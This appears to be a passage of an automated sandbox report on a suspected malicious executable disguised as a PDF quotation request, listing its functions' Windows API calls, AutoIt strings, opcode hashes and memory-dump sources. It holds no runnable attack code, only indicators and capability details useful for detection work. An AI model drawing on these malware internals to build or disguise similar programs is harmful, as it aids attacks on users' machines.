                                                                    Similarity
                                                                    • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 1291720006-3916222277
                                                                    • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                    • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                    • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                    • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                    Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                    • IsMenu.USER32(?), ref: 0045FC5F
                                                                    • CreatePopupMenu.USER32 ref: 0045FC97
                                                                    • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                    • String ID: 0$2
                                                                    • API String ID: 93392585-3793063076
                                                                    • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                    • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                    • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                    • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                    Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                    • VariantClear.OLEAUT32(?), ref: 00435320
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                    • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                    • String ID: crts
                                                                    • API String ID: 586820018-3724388283
                                                                    • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                    • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                    • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                    • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                    Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,0040F545,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,004A90E8,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,?,0040F545), ref: 0041013C
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                    • _wcscat.LIBCMT ref: 0044BCAF
                                                                    • _wcslen.LIBCMT ref: 0044BCBB
                                                                    • _wcslen.LIBCMT ref: 0044BCD1
                                                                    • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 2326526234-1173974218
                                                                    • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                    • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                    • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                    • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                    Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                    • _wcslen.LIBCMT ref: 004335F2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                    • GetLastError.KERNEL32 ref: 0043362B
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                    • _wcsrchr.LIBCMT ref: 00433666
                                                                      • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                    • String ID: \
                                                                    • API String ID: 321622961-2967466578
                                                                    • Opcode ID: 81cb13daa9af2fd8c1153ed84f988300e4acaa6a87e34bc6b07dd4fec930aca5
                                                                    • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                    • Opcode Fuzzy Hash: 81cb13daa9af2fd8c1153ed84f988300e4acaa6a87e34bc6b07dd4fec930aca5
                                                                    • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                    Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: 4c1289b990d2add33d16b64a277af7c2db64037aef378f833fcd5b38fa60a411
                                                                    • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                    • Opcode Fuzzy Hash: 4c1289b990d2add33d16b64a277af7c2db64037aef378f833fcd5b38fa60a411
                                                                    • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                    Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                    • __lock.LIBCMT ref: 00417981
                                                                      • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                      • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                      • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                    • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                    • __lock.LIBCMT ref: 004179A2
                                                                    • ___addlocaleref.LIBCMT ref: 004179C0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                    • String ID: KERNEL32.DLL$pI
                                                                    • API String ID: 637971194-197072765
                                                                    • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                    • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                    • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                    • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                    Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_malloc
                                                                    • String ID:
                                                                    • API String ID: 1938898002-0
                                                                    • Opcode ID: 18952b3d412471a5ed9da7bcf155e9e6259566645eb9f54bbaf82b361ded0344
                                                                    • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                    • Opcode Fuzzy Hash: 18952b3d412471a5ed9da7bcf155e9e6259566645eb9f54bbaf82b361ded0344
                                                                    • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                    Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                    • _memmove.LIBCMT ref: 0044B555
                                                                    • _memmove.LIBCMT ref: 0044B578
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                    • String ID:
                                                                    • API String ID: 2737351978-0
                                                                    • Opcode ID: 4e086f6b3af6bf849e204d87749429cbd2f556d0c5b9f3e943595c9155d9fc7d
                                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                    • Opcode Fuzzy Hash: 4e086f6b3af6bf849e204d87749429cbd2f556d0c5b9f3e943595c9155d9fc7d
                                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                    Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                                    • __getptd.LIBCMT ref: 00415253
                                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                    • _free.LIBCMT ref: 0041529E
                                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                    • String ID:
                                                                    • API String ID: 3638380555-0
                                                                    • Opcode ID: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                    • Opcode Fuzzy Hash: ceb77f577b932ecc061a214adf97d6bda1f2bbbde8b0acc1a90a04adb45bcfac
                                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                    Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 3207048006-625585964
                                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                    Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                    • _memmove.LIBCMT ref: 004656CA
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                    • String ID:
                                                                    • API String ID: 2945290962-0
                                                                    • Opcode ID: 861621b3bc9d23e299d0c06e3d54db9a70791c433b129c8d2c46b05cd3269fa8
                                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                    • Opcode Fuzzy Hash: 861621b3bc9d23e299d0c06e3d54db9a70791c433b129c8d2c46b05cd3269fa8
                                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                    Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                    • String ID:
                                                                    • API String ID: 1457242333-0
                                                                    • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                    • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                    • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                    • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                    Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
